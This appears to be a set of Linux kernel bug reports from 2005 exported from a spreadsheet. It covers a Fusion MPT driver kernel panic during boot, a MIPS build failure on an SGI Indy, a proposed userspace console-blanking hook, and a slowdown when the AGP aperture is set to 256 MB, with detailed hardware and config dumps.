ACPI: PCI Interrupt Link [LP02] (IRQs *10) ACPI: PCI Interrupt Link [LP03] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP04] (IRQs *11) ACPI: PCI Interrupt Link [LP05] (IRQs *10) ACPI: PCI Interrupt Link [LP06] (IRQs *3) ACPI: PCI Interrupt Link [LP07] (IRQs *10) ACPI: PCI Interrupt Link [LP08] (IRQs *9) ACPI: PCI Interrupt Link [LP09] (IRQs *5) ACPI: PCI Interrupt Link [LP0A] (IRQs *10) ACPI: PCI Interrupt Link [LP0B] (IRQs *9) ACPI: PCI Interrupt Link [LP0C] (IRQs *9) ACPI: PCI Interrupt Link [LP0D] (IRQs *11) ACPI: PCI Interrupt Link [LP0E] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP0F] (IRQs *11) ACPI: PCI Interrupt Link [LP10] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP11] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP12] (IRQs *5) ACPI: PCI Interrupt Link [LP13] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP14] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP15] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP16] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP17] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP18] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP19] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1A] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1B] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1C] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1D] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1E] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LP1F] (IRQs) *0, disabled. ACPI: PCI Interrupt Link [LPUS] (IRQs *11) Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnP ACPI: found 14 devices SCSI subsystem initialized usbcore: registered new driver usbfs usbcore: registered new driver hub PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report pnp: 00:00: ioport range 0x900-0x93f has been reserved pnp: 00:00: ioport range 0x510-0x517 could not be reserved pnp: 00:00: ioport range 0x504-0x507 could not be reserved pnp: 00:00: ioport range 0x500-0x503 could not be reserved pnp: 00:00: ioport range 0x520-0x53f has been reserved pnp: 00:00: ioport range 0x420-0x427 has been reserved pnp: 00:00: ioport range 0x460-0x461 has been reserved pnp: 00:0b: ioport range 0x1ec-0x1ef has been reserved pnp: 00:0b: ioport range 0x400-0x4fe could not be reserved pnp: 00:0b: ioport range 0x600-0x600 has been reserved pnp: 00:0b: ioport range 0x800-0x80f has been reserved pnp: 00:0b: ioport range 0xc00-0xcfe could not be reserved pnp: 00:0b: ioport range 0xf50-0xf58 has been reserved Machine check exception polling timer started. audit: initializing netlink socket (disabled) audit(1121077976.640:1): initialized Installing knfsd (copyright (C) 1996 okir@monad.swb.de). pci_hotplug: PCI Hot Plug PCI Core version: 0.5 ACPI: Power Button (FF) [PWRF] lp: driver loaded but no devices found Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.0.0 20040925 PNP: PS/2 controller has invalid data port 0x64; using default 0x60 PNP: PS/2 controller has invalid command port 0x60; using default 0x64 PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A parport: PnPBIOS parport detected. parport0: PC-style at 0x378, irq 7 [PCSPP(,...)] p0: using parport0 (interrupt-driven). io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered Floppy drive(s): fd0 is 1.44M FDC 0 is a National Semiconductor PC87306 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize e100: Intel(R) PRO/100 Network Driver, 3.4.8-k2-NAPI e100: Copyright(c) 1999-2005 Intel Corporation ACPI: PCI Interrupt 0000:02:01.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 16 e100: eth0: e100_probe: addr 0xfbfff000, irq 16, MAC addr 00:03:47:E0:67:78 ACPI: PCI Interrupt 0000:09:06.0[A] -&gt; GSI 31 (level, low) -&gt; IRQ 17 e100: eth1: e100_probe: addr 0xf53ff000, irq 17, MAC addr 00:02:55:50:04:D6 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx hda: LTN486S, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hda: ATAPI 48X CD-ROM drive, 120kB Cache Uniform CD-ROM driver Revision: 3.20 PCI: Enabling device 0000:07:05.0 (0156 -&gt; 0157) ACPI: PCI Interrupt 0000:07:05.0[A] -&gt; GSI 24 (level, low) -&gt; IRQ 18 scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.36 &lt;Adaptec 29160B Ultra160 SCSI adapter&gt; aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs Fusion MPT base driver 3.03.02 Copyright (c) 1999-2005 LSI Logic Corporation Fusion MPT SPI Host driver 3.03.02 ACPI: PCI Interrupt 0000:05:07.0[A] -&gt; GSI 27 (level, low) -&gt; IRQ 19 mptbase: Initiating ioc0 bringup Unable to handle kernel paging request at virtual address 00001e08 printing eip: c11d5c1f *pde = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;c11d5c1f&gt;] Not tainted VLI EFLAGS: 00010006 (2.6.13-rc1) EIP is at mptscsih_io_done+0x1f/0x2f0 eax: c1794000 ebx: 00000000 ecx: 00000000 edx: 00000250 esi: 00000000 edi: 00000000 ebp: 00001e00 esp: c1617d08 ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=c1616000 task=c1601a00) Stack: c160f151 c111007c 00000000 c11153a3 0000006c 00000250 c1794000 00000000 c1794000 00000000 0000000e c11cff4f c17b3a00 00000000 00001e00 c16067c0 c1401380 00000013 00000001 c103e0bb 00000000 00000000 c1617dc0 00000000 Call Trace: [&lt;c111007c&gt;] acpi_os_release_lock+0xd/0x2b [&lt;c11153a3&gt;] acpi_ev_gpe_detect+0xde/0x101 [&lt;c11cff4f&gt;] mpt_interrupt+0xcf/0x1a0 [&lt;c103e0bb&gt;] misrouted_irq+0x16b/0x190 [&lt;c103e23f&gt;] note_interrupt+0x9f/0xc0 [&lt;c103da3e&gt;] __do_IRQ+0x12e/0x140 [&lt;c1005723&gt;] do_IRQ+0x23/0x40 [&lt;c1003c22&gt;] common_interrupt+0x1a/0x20 [&lt;c101c24d&gt;] release_console_sem+0x6d/0x100 [&lt;c101c07a&gt;] vprintk+0x18a/0x270 [&lt;c125aa78&gt;] pci_conf1_read+0xa8/0x100 [&lt;c125c23c&gt;] pci_read+0x2c/0x40 [&lt;c110001f&gt;] kobject_get+0xf/0x20 [&lt;c101bee7&gt;] printk+0x17/0x20 [&lt;c11d101f&gt;] mpt_do_ioc_recovery+0x4f/0x4f0 [&lt;c11d09ee&gt;] mpt_attach+0x2ae/0x5d0 [&lt;c11dabb2&gt;] mptspi_probe+0x12/0x400 [&lt;c1108d26&gt;] pci_device_probe_static+0x46/0x60 [&lt;c1108d77&gt;] __pci_device_probe+0x37/0x50 [&lt;c1108db6&gt;] pci_device_probe+0x26/0x50 [&lt;c11665d3&gt;] driver_probe_device+0x33/0xa0 [&lt;c11666e9&gt;] __driver_attach+0x39/0x40 [&lt;c1165e55&gt;] bus_for_each_dev+0x45/0x60 [&lt;c1166706&gt;] driver_attach+0x16/0x20 [&lt;c11666b0&gt;] __driver_attach+0x0/0x40 [&lt;c116621b&gt;] bus_add_driver+0x7b/0xa0 [&lt;c1108eb0&gt;] pci_device_shutdown+0x0/0x20 [&lt;c110900b&gt;] pci_register_driver+0x6b/0x90 [&lt;c140a85b&gt;] do_initcalls+0x2b/0xc0 [&lt;c1065325&gt;] kern_mount+0x15/0x17 [&lt;c1000290&gt;] init+0x0/0x100 [&lt;c10002bf&gt;] init+0x2f/0x100 [&lt;c10013b8&gt;] kernel_thread_helper+0x0/0x18 [&lt;c10013bd&gt;] kernel_thread_helper+0x5/0x18 Code: 41 04 e9 53 ff ff ff 0f 0b eb ce 90 55 89 d5 57 56 89 ce 53 83 ec 1c 89 44 24 18 8b 90 c0 00 00 00 81 c2 50 02 00 00 89 54 24 14 &lt;0f&gt; b7 4d 08 89 4c 24 10 8b 42 0c 8b 1c 88 85 db 0f 84 90 02 0 0 &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt ----------log end---------------</t>
  </si>
  <si>
    <t>Due changes of register names, it's impossible to compile arch/mips/kernel/proces.c</t>
  </si>
  <si>
    <t>2005-07-12 00:25 UTC</t>
  </si>
  <si>
    <t>David Ricar</t>
  </si>
  <si>
    <t>2006-08-17 17:18 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge r0a, default 2.4 kernel Hardware Environment: Sgi INDY (R4000, 100MHz, 32MB ram, 2GB scsi, 8bit sgi graphics) Software Environment: Linux Problem Description: I tried to compile 2.6 on my new Indy. Despite that it consumes more than 10 hours, I was unable to compile it because 4 register names changed in past, but not everywhere, lines 169-172 need to strip CP0_ from the name (EF_CP0_xxxx). Kernel then compiles, but it was still unable to boot, but it might be problem of mine. Steps to reproduce: make vmlinux on sgi indy and probably on all MIPSes</t>
  </si>
  <si>
    <t>proposed userspace console_blank_hook</t>
  </si>
  <si>
    <t>2.6.27</t>
  </si>
  <si>
    <t>2005-07-12 02:00 UTC</t>
  </si>
  <si>
    <t>2009-07-20 14:16 UTC</t>
  </si>
  <si>
    <t>I've implemented a kernel module that provides a console_blank_hook that calls out a userspace program for blanking/unblanking the console. This is meant for people who don't use APM and therefore can't user APM console blanking, but have some userspace tool that can blank their hardware, for example, my IBM laptop's backlight can be turned off/on using radeontool. This modules calls out (using kernel's call_usermode_helper) /sbin/user_vc_blank (by default) which does all the work. I think this code can be added to the kernel itself.</t>
  </si>
  <si>
    <t>2005-09-30 06:12 UTC</t>
  </si>
  <si>
    <t>2.6.13-rc3-git2</t>
  </si>
  <si>
    <t>Slowdown when AGP aperture is 256 MB</t>
  </si>
  <si>
    <t>2.6.21.5-smp</t>
  </si>
  <si>
    <t>2005-07-16 06:47 UTC</t>
  </si>
  <si>
    <t>David Flater</t>
  </si>
  <si>
    <t>2009-03-23 10:27 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: Serious system slowdown when AGP aperture is 256 MB. [2.] Full description of the problem/report: When AGP aperture is set to 256 MB in BIOS setup, Linux slows to a crawl. When AGP aperture is set to 4 MB in BIOS setup, Linux runs normally. Memory model is CONFIG_HIGHMEM4G. See kernel config included below. I have no idea which component corresponds to this bug and I have just guessed as instructed. [3.] Keywords (i.e., modules, networking, kernel): kernel memory [4.] Kernel version (from /proc/version): Linux version 2.6.12.2 (dave@yellowbeard) (gcc version 3.3.4) #1 SMP Sat Jul 9 17:42:32 EDT 2005 [7.1.] Software (add the output of the ver_linux script here) Linux yellowbeard 2.6.12.2 #1 SMP Sat Jul 9 17:42:32 EDT 2005 i686 unknown unknown GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.35 reiserfsprogs 3.6.18 reiser4progs line pcmcia-cs 3.2.8 Linux C Library 2.3.4 Dynamic linker (ldd) 2.3.4 Linux C++ Library 5.0.6 Procps 3.2.3 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded nvidia lp parport_pc parport [7.2.] Processor information (from /proc/cpuinfo): Single CPU with hyperthreading-induced schizophrenia. processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 3 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 4 cpu MHz : 3185.565 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6291.45 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 3 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 4 cpu MHz : 3185.565 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6356.99 [7.3.] Module information (from /proc/modules): nvidia 3706852 - - Live 0xf8dab000 lp 8548 - - Live 0xf8973000 parport_pc 22340 - - Live 0xf8961000 parport 20416 - - Live 0xf8969000 [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 0400-043f : 0000:00:1f.0 0800-087f : 0000:00:1f.0 0800-0803 : PM1a_EVT_BLK 0804-0805 : PM1a_CNT_BLK 0808-080b : PM_TMR 0810-0815 : ACPI CPU throttle 0828-082f : GPE0_BLK 0c00-0c1f : 0000:00:1f.3 0cf8-0cff : PCI conf1 bc00-bcff : 0000:02:06.0 bc00-bcff : r8169 c400-c43f : 0000:00:1f.5 c400-c43f : Intel ICH5 c800-c8ff : 0000:00:1f.5 c800-c8ff : Intel ICH5 cc00-cc1f : 0000:00:1d.0 cc00-cc1f : uhci_hcd d000-d01f : 0000:00:1d.1 d000-d01f : uhci_hcd d400-d41f : 0000:00:1d.2 d400-d41f : uhci_hcd d800-d81f : 0000:00:1d.3 d800-d81f : uhci_hcd dc00-dc0f : 0000:00:1f.2 dc00-dc0f : libata e000-e003 : 0000:00:1f.2 e000-e003 : libata e400-e407 : 0000:00:1f.2 e400-e407 : libata e800-e803 : 0000:00:1f.2 e800-e803 : libata ec00-ec07 : 0000:00:1f.2 ec00-ec07 : libata fc00-fc0f : 0000:00:1f.1 fc00-fc07 : ide0 fc08-fc0f : ide1 iomem with AGP aperture set to 4 MB in BIOS: 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000e0000-000effff : Extension ROM 000f0000-000fffff : System ROM 00100000-d63effff : System RAM 00100000-003be795 : Kernel code 003be796-004cf97f : Kernel data d63f0000-d63f7fff : ACPI Tables d63f8000-d63fffff : ACPI Non-volatile Storage d6400000-f63fffff : PCI Bus #01 e0000000-efffffff : 0000:01:00.0 f6400000-f64003ff : 0000:00:1f.1 f6500000-fe5fffff : PCI Bus #01 fa000000-faffffff : 0000:01:00.0 fc000000-fcffffff : 0000:01:00.0 fc000000-fcffffff : nvidia fe6fff00-fe6fffff : 0000:02:06.0 fe6fff00-fe6fffff : r8169 fe7ff900-fe7ff9ff : 0000:00:1f.5 fe7ff900-fe7ff9ff : Intel ICH5 fe7ffa00-fe7ffbff : 0000:00:1f.5 fe7ffa00-fe7ffbff : Intel ICH5 fe7ffc00-fe7fffff : 0000:00:1d.7 fe7ffc00-fe7fffff : ehci_hcd fe800000-febfffff : 0000:00:00.0 fec00000-fec00fff : reserved fee00000-fee00fff : reserved fff00000-ffffffff : reserved iomem with AGP aperture set to 256 MB in BIOS: 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000e0000-000effff : Extension ROM 000f0000-000fffff : System ROM 00100000-bfeeffff : System RAM 00100000-003be795 : Kernel code 003be796-004cf97f : Kernel data bfef0000-bfef7fff : ACPI Tables bfef8000-bfefffff : ACPI Non-volatile Storage bff00000-dfefffff : PCI Bus #01 c0000000-cfffffff : 0000:01:00.0 dff00000-dff003ff : 0000:00:1f.1 e0000000-efffffff : 0000:00:00.0 f6900000-fe9fffff : PCI Bus #01 fa000000-faffffff : 0000:01:00.0 fc000000-fcffffff : 0000:01:00.0 fc000000-fcffffff : nvidia feafff00-feafffff : 0000:02:06.0 feafff00-feafffff : r8169 febff900-febff9ff : 0000:00:1f.5 febff900-febff9ff : Intel ICH5 febffa00-febffbff : 0000:00:1f.5 febffa00-febffbff : Intel ICH5 febffc00-febfffff : 0000:00:1d.7 febffc00-febfffff : ehci_hcd fec00000-fec00fff : reserved fee00000-fee00fff : reserved fff00000-ffffffff : reserved [7.5.] PCI information ('lspci -vvv' as root) 00:00.0 Host bridge: Intel Corp. 82865G/PE/P DRAM Controller/Host-Hub Interface (rev 02) Subsystem: Micro-Star International Co., Ltd.: Unknown device 7280 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at fe800000 (32-bit, prefetchable) [size=4M] Capabilities: [e4] #09 [2106] Capabilities: [a0] AGP version 3.0 Status: RQ=32 Iso- ArqSz=2 Cal=2 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=2 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 00:01.0 PCI bridge: Intel Corp. 82865G/PE/P PCI to AGP Controller (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000f000-00000fff Memory behind bridge: f6500000-fe5fffff Prefetchable memory behind bridge: d6400000-f63fffff BridgeCtl: Parity+ SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1d.0 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at cc00 [size=32] 00:1d.1 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at d000 [size=32] 00:1d.2 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at d400 [size=32] 00:1d.3 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB UHCI #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at d800 [size=32] 00:1d.7 USB Controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 23 Region 0: Memory at fe7ffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [20a0] 00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB/EB/ER Hub interface to PCI Bridge (rev c2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: fe600000-fe6fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp. 82801EB/ER (ICH5/ICH5R) LPC Bridge (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corp. 82801EB/ER (ICH5/ICH5R) Ultra ATA 100 Storage Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at fc00 [size=16] Region 5: Memory at f6400000 (32-bit, non-prefetchable) [size=1K] 00:1f.2 IDE interface: Intel Corp. 82801EB (ICH5) Serial ATA 150 Storage Controller (rev 02) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: Micro-Star International Co., Ltd.: Unknown device 7585 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at ec00 [size=8] Region 1: I/O ports at e800 [size=4] Region 2: I/O ports at e400 [size=8] Region 3: I/O ports at e000 [size=4] Region 4: I/O ports at dc00 [size=16] 00:1f.3 SMBus: Intel Corp. 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) Subsystem: Micro-Star International Co., Ltd. 865PE Neo2 (MS-6728) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at 0c00 [size=32] 00:1f.5 Multimedia audio controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) AC'97 Audio Controller (rev 02) Subsystem: Micro-Star International Co., Ltd.: Unknown device 7585 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 17 Region 0: I/O ports at c800 [size=256] Region 1: I/O ports at c400 [size=64] Region 2: Memory at fe7ffa00 (32-bit, non-prefetchable) [size=512] Region 3: Memory at fe7ff900 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: nVidia Corporation: Unknown device 0045 (rev a1) (prog-if 00 [VGA]) Subsystem: nVidia Corporation: Unknown device 0204 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at fc000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e0000000 (32-bit, prefetchable) [size=256M] Region 2: Memory at fa000000 (32-bit, non-prefetchable) [size=16M] Expansion ROM at fe5e0000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=256 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=32 ArqSz=2 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 02:06.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 (rev 10) Subsystem: Micro-Star International Co., Ltd.: Unknown device 728c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (8000ns min, 16000ns max), cache line size 20 Interrupt: pin A routed to IRQ 20 Region 0: I/O ports at bc00 [size=256] Region 1: Memory at fe6fff00 (32-bit, non-prefetchable) [size=256] Expansion ROM at fe6c0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- [7.6.] SCSI information (from /proc/scsi/scsi) Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: HDS722525VLSA80 Rev: V36O Type: Direct-Access ANSI SCSI revision: 05 [7.7.] Other information that might be relevant to the problem A) Mobo: MSI 865PE Neo3-F B) I am running a full 4 GiB RAM. C) Here is my config. # # Automatically generated make config: don't edit # Linux kernel version: 2.6.12.2 # Sat Jul 9 17:35:45 2005 # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_HOTPLUG=y CONFIG_KOBJECT_UEVENT=y # CONFIG_IKCONFIG is not set # CONFIG_CPUSETS is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set 